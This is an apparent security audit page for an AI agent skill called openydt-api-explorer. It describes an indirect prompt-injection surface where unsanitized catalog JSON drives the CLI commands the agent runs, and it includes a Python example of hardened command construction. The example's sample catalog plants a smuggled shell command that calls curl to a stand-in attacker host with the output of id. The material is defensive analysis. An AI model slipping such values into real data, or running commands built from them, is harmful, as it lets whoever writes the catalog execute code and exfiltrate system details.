openydt-api-explorer

Pass

Audited by Gen Agent Trust Hub on Jun 13, 2026

Risk Level: SAFE
[COMMAND_EXECUTION] [PROMPT_INJECTION]
Full Analysis
  • [COMMAND_EXECUTION]: The skill instructs the agent to run the openydt CLI, and to run jq and python3 over the API catalog to process it.
  • [PROMPT_INJECTION]: The skill exposes an indirect prompt injection surface: content read from an external JSON catalog is used to build CLI commands dynamically, so whoever can write to the catalog can influence which commands the agent runs.
  • Ingestion points: The agent is instructed to read from catalog/catalog.json, including a hardcoded local developer path /Users/zhoujw/develop/tmp/openydt-cli/catalog/catalog.json.
  • Boundary markers: No explicit delimiters or protective instructions isolate the ingested catalog data from the agent's command-generation logic.
  • Capability inventory: The skill relies on shell execution via openydt, jq, and python3.
  • Sanitization: No validation or sanitization of the data read from the catalog file is specified before that data is used to construct commands.
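The two patterns the findings above contrast, as an added example that is not code from the audited skill or from the openydt project: a catalog entry pasted straight into a shell string, beside a hardened path that allowlist-validates the fields and hands them to the CLI as an argv list without a shell. The catalog layout (`{"apis": [{"name", "path"}]}`), the sample entries, and the `openydt call <name> --path <path>` invocation are assumptions made for the illustration; the audit page gives neither the real catalog schema nor the real CLI syntax.

```python
import json
import re

# Constructed sample catalog (not the real catalog/catalog.json): the second
# entry carries a shell payload in its "name" field, as an attacker who could
# write to the catalog might plant it.
CATALOG_JSON = json.dumps({
    "apis": [
        {"name": "listUsers", "path": "/v1/users"},
        {"name": "getUser; curl http://attacker.invalid/$(id)",
         "path": "/v1/users/{id}"},
    ]
})

# Hypothetical invocation shape; the real openydt CLI syntax is not given on
# the audit page, so "call <name> --path <path>" is an assumption.
CLI = "openydt"

# Allowlists for the only two fields that ever reach the command line.
NAME_RE = re.compile(r"[A-Za-z][A-Za-z0-9_]{0,63}")
PATH_RE = re.compile(r"/[A-Za-z0-9_/{}.\-]*")


def load_catalog(text: str) -> list:
    """Parse the catalog and return its entry list; reject unexpected shapes."""
    doc = json.loads(text)
    apis = doc.get("apis") if isinstance(doc, dict) else None
    if not isinstance(apis, list):
        raise ValueError("catalog: expected {'apis': [...]}")
    return apis


def naive_command(entry: dict) -> str:
    """The audited pattern: catalog text interpolated into one shell string.
    Passing this to `sh -c` runs whatever the catalog author wrote after ';'."""
    return f"{CLI} call {entry['name']} --path {entry['path']}"


def validate_entry(entry: dict) -> tuple:
    """Allowlist-validate the catalog fields before they touch a command."""
    if not isinstance(entry, dict):
        raise ValueError("catalog entry is not an object")
    name, path = entry.get("name"), entry.get("path")
    if not isinstance(name, str) or not NAME_RE.fullmatch(name):
        raise ValueError(f"rejected catalog name: {name!r}")
    if not isinstance(path, str) or not PATH_RE.fullmatch(path):
        raise ValueError(f"rejected catalog path: {path!r}")
    return name, path


def safe_argv(entry: dict) -> list:
    """Hardened form: validated fields passed as an argv list, no shell.
    Execute with subprocess.run(safe_argv(entry), shell=False, check=True);
    each field stays a single argument even if it contained spaces."""
    name, path = validate_entry(entry)
    return [CLI, "call", name, "--path", path]


def plan(text: str) -> dict:
    """Split a catalog into runnable argv lists and rejected entries."""
    accepted, rejected = [], []
    for entry in load_catalog(text):
        try:
            accepted.append(safe_argv(entry))
        except ValueError as exc:
            rejected.append(str(exc))
    return {"accepted": accepted, "rejected": rejected}


if __name__ == "__main__":
    for entry in load_catalog(CATALOG_JSON):
        print("naive  :", naive_command(entry))
    print("hardened:", plan(CATALOG_JSON))
```

The point is that the hardening lives in two places: the regex allowlist decides which catalog values are ever allowed to name an API, and the argv list removes the shell so that even a value that slipped past the allowlist would arrive at openydt as one argument rather than as a second command. A jq pipeline that emits the same strings into `xargs` or `sh -c` has neither protection.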
Audit Metadata
Risk Level
SAFE
Analyzed
Jun 13, 2026, 01:16 PM
Security Audit — agent-trust-hub — openydt-api-explorer